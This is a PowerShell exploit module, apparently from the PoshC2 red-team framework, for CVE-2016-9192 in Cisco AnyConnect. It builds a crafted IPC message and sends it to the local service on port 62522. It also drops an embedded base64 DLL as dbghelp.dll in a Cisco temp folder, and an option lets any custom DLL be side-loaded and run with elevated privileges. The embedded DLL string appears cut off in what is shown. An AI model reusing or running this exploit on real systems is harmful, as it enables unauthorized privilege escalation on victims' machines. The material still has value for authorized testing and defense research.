PoshC2_Python/Modules/CVE-2016-9192.ps1

159 lines
40 KiB
PowerShell
Raw Permalink Normal View History

2018-07-23 08:55:15 +00:00
<#
.Synopsis
Attempts to exploit cve-2016-9192 which misuses a side loading vulnearbility in Cisco Anyconnects vpnupdater
.DESCRIPTION
Attempts to exploit cve-2016-9192 which misuses a side loading vulnearbility in Cisco Anyconnects vpnupdater. This module drops a DLL to disk that will only create a file to prove the exploit works under the root of C:
Script Author: Ben Turner @benpturner
POC: Proof-of-concept and initial code from https://github.com/serializingme/cve-2016-9192
.EXAMPLE
PS C:\> Invoke-CVE-2016-919
.EXAMPLE
PS C:\> Invoke-CVE-2016-919 -CustomDLL <path to dll>
#>
Function Invoke-CVE-2016-9192 {
param ($CustomDLL)
[Byte[]] $payload =
0x4F, 0x43, 0x53, 0x43,
# Message header length
0x1A, 0x00,
# Message body length
0xE4, 0x00,
# IPC response
0xFF, 0xFF, 0xFF, 0xFF,
# Message user context
0x00, 0x00, 0x00, 0x00,
# Request message identifier
0x02, 0x00, 0x00, 0x00,
# Return IPC object
0x00, 0x00, 0x00, 0x00,
# Message type
0x01,
# Message identifier
0x02,
# File path
# C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
0x00, 0x01, # Type
0x00, 0x57, # Length
0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
0x78, 0x65, 0x00,
# Command line (command line should start with "CAC-" or other valid command)
# CAC-doesnt-matter
0x00, 0x02, # Type
0x00, 0x12, # Length
0x43, 0x41, 0x43, 0x2D, 0x64, 0x6F, 0x65, 0x73, 0x6E, 0x74, 0x2D, 0x6D,
0x61, 0x74, 0x74, 0x65, 0x72, 0x00,
# GUI desktop (not mandatory)
# WinSta0\Default
0x00, 0x04,
0x00, 0x10,
0x57, 0x69, 0x6E, 0x53, 0x74, 0x61, 0x30, 0x5C, 0x44, 0x65, 0x66, 0x61,
0x75, 0x6C, 0x74, 0x00,
# Use installed
# False
0x80, 0x05,
0x00, 0x00,
# Relocatable file path
# C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
0x00, 0x06,
0x00, 0x57,
0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
0x78, 0x65, 0x00
$Base64Dll = "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
$Exploited = "C:\CVE-2016-9192.txt"
$TempFolder = "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp"
$TempPath = "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Downloader"
$DLLLocation = "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Downloader\dbghelp.dll"
if ($CustomDLL) {
Write-Output "[.] Using custom DLL: $CustomDLL"
$Base64Dll = ConvertTo-Base64 $CustomDLL
}
$PathExists = Test-Path $TempPath
if (!$PathExists) {
New-Item $TempPath -ItemType Directory | Out-Null
}
$PathExists = Test-Path $DLLLocation
if (!$PathExists) {
Write-Output "[.] Dropping DLL to disk: $DLLLocation"
$fileBytes = [Convert]::FromBase64String($Base64Dll)
[io.file]::WriteAllBytes($DLLLocation, $fileBytes)
} else {
Write-Output "[.] Using DLL already in the following location: $DLLLocation"
}
Write-Output "[.] Connecting to localhost on port 62522"
try
{
$socket = New-Object System.Net.Sockets.TcpClient( "127.0.0.1", "62522" )
Write-Output "[.] Sucessfully connected to localhost on port 62522"
}
catch
{
Write-Output "`n[-] Connection failed, is Cisco Anyconnect running"
exit -1
}
$stream = $socket.GetStream();
$stream.Write($payload,0,$payload.Length);
$stream.Flush();
$stream.Close();
Start-Sleep 2
if ($CustomDLL) {
Write-Output "`n[+] Exploitted, custom DLL should have been executed!"
} else {
$PathExists = Test-Path $Exploited
if (!$PathExists) {
Write-Output "`n[-] Exploit failed!"
} else {
Write-Output "`n[+] Exploit successful! Target is vulnerable to CVE-2016-9192"
Write-Output "[+] To add a custom DLL use the following command: Invoke-CVE-2016-9192 -CustomDLL <Path to DLL>"
}
}
Write-Output "[+] Manual removal of $TempFolder required"
}
function ConvertTo-Base64
{
param
(
[string] $Source
)
$bufferSize = 90000
$buffer = New-Object byte[] $bufferSize
$reader = [System.IO.File]::OpenRead($Source)
$base64 = $null
$bytesRead = 0
do
{
$bytesRead = $reader.Read($buffer, 0, $bufferSize);
$base64 += ([Convert]::ToBase64String($buffer, 0, $bytesRead));
} while ($bytesRead -eq $bufferSize);
$reader.Dispose()
$base64
}